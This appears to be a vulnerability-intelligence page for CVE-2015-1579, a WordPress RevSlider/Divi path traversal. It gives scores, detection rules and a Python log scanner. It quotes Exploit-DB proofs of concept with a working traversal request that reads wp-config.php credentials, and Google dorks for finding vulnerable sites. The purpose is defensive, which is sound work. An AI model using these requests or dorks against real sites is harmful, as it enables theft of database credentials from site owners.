CVE-2015-1579
published 2015-02-11
CVE-2015-1579: Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img…
Priority P2 · 71 · medium 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 22.05% (97.4th percentile)
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
Detection & IOCs (extracted from sources)
sigma
matchers:
  - type: word
    part: body
    words:
      - "'DB_NAME'"
      - "'DB_PASSWORD'"
      - "'DB_USER'"
    condition: and
  - type: status
    status:
      - 200
- Detect exploitation attempts by monitoring GET requests to wp-admin/admin-ajax.php with the 'action=revslider_show_image' parameter combined with directory traversal sequences (../) in the 'img' parameter.
- Successful exploitation is confirmed when the HTTP 200 response body contains WordPress database credential strings such as 'DB_NAME', 'DB_PASSWORD', and 'DB_USER', indicating wp-config.php was disclosed.
- Use the Google dork 'inurl:/wp-content/plugins/revslider' to identify potentially vulnerable WordPress installations exposed on the internet.
- The vulnerability is unauthenticated (no WordPress login required); any remote attacker can trigger the traversal via a direct GET request to the admin-ajax.php endpoint.
- This CVE may be a duplicate of CVE-2014-9734; the same vulnerable endpoint and traversal technique appear across multiple WordPress themes (Divi, CuckooTap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Striking, Beach Apollo) that bundle the RevSlider plugin, so detections should not be scoped to a single theme.
- The affected plugin version is Slider Revolution Responsive <= 4.1.4; detections should be validated against this version ceiling to avoid false positives on patched installations.
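The two detection rules above (the request-side pattern and the response-body confirmation), implemented as an added example that is not part of any of the listed sources. The log lines are constructed samples; the request check decodes the img parameter so percent-encoded traversal is caught as well as the literal ../ form.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic). The second one
# carries the traversal percent-encoded, the third is a benign image fetch.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Feb/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [11/Feb/2015:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.9 - - [11/Feb/2015:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/banner.png HTTP/1.1" 200 8812',
    '198.51.100.3 - - [11/Feb/2015:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 1532',
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A ".." path segment bounded by slashes/backslashes or the string ends.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def is_traversal_attempt(log_line: str) -> bool:
    """True if the request matches the revslider_show_image traversal pattern."""
    m = LOG_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    qs = parse_qs(url.query)          # parse_qs percent-decodes values once
    if "revslider_show_image" not in qs.get("action", []):
        return False
    for img in qs.get("img", []):
        # Decode a second time so double-encoded sequences are also caught.
        if TRAVERSAL.search(unquote(img)):
            return True
    return False

CREDENTIAL_MARKERS = ("'DB_NAME'", "'DB_PASSWORD'", "'DB_USER'")

def is_confirmed_disclosure(status: int, body: str) -> bool:
    """True when a 200 response body carries all wp-config.php credential markers."""
    return status == 200 and all(marker in body for marker in CREDENTIAL_MARKERS)

def scan(lines):
    """Return the log lines that look like exploitation attempts."""
    return [line for line in lines if is_traversal_attempt(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("traversal attempt:", hit)
```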
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck · 5.0 MEDIUM
GHSA
GHSA-rvjj-jxmx-c45g · CVE-2015-1579 [MEDIUM] CWE-22 · ghsa_unreviewed · 2022-05-17 · CVSS 5.0
VulnCheck
elegantthemes divi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck · 2015 · CVSS 5.0 · CVE-2015-1579 [MEDIUM]
Affected: elegantthemes divi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Exploit PoC: https://vulncheck.com/xdb/6ccdf94b0bd1; https://vulncheck.com/xdb/ad076f4bdf7d
No detection rules found.
Exploit-DB
WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download
exploitdb · 2015-03-30 · CVE-2015-1579
---
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
######################
# Description
Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability
######################
# PoC
http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#####################
Discovered By : Claudio Viviani
Exploit-DB
Multiple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download
exploitdb · 2014-09-01 · CVE-2015-1579
---
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: [email protected]
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ul
Nuclei
WordPress Slider Revolution - Local File Disclosure
nuclei · CVSS 5.0 · CVE-2015-1579 [MEDIUM]
Template:
id: CVE-2015-1579
info:
  name: WordPress Slider Revolution - Local File Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
  impact: |
    An atta